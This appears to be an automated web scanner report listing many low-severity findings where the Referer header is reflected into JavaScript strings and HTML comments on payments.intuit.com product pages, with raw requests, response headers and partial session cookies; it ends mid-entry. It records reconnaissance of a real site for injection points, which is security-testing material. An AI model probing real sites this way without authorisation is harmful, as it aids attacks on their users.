Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:23 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=v X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C3C7A0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 96465 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:39 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=wIeJmrvn X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C7A2C0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 96494 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:21 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=pD4WYGG X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FDB4B0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 109428 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:39 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID= X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96023F60A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 109460 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/echecks-and |
GET /products/echecks-and Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:06:08 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9617F910A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145489 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/echecks-and |
GET /products/echecks-and Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:06:03 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9616AE30A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145455 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/internet |
GET /products/internet Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:20 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FD8DC0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116417 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/internet |
GET /products/internet Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:01 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F8FAC0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116386 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/online-credit |
GET /products/online-credit Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:37 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=nsY X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96105730A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116174 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/online-credit |
GET /products/online-credit Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:47 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9612C450A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116206 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:59 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=ACIQv X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9615C020A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140415 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:53 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=Hl X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96143690A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140382 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:47 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960424A0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100547 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:03 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96081C10A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100579 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:21 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FDDB70A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100578 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:02 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F93050A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100546 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:59 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9615C5C0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145458 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:06:05 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96173AA0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145490 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:38 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9610A390A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140381 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:49 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D961352D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140415 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:34 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=Gip6gRfT X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960F89B0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 133395 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:21 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960C5470A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 133364 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:48 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D961303D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116174 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:56 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9614DF20A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116205 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
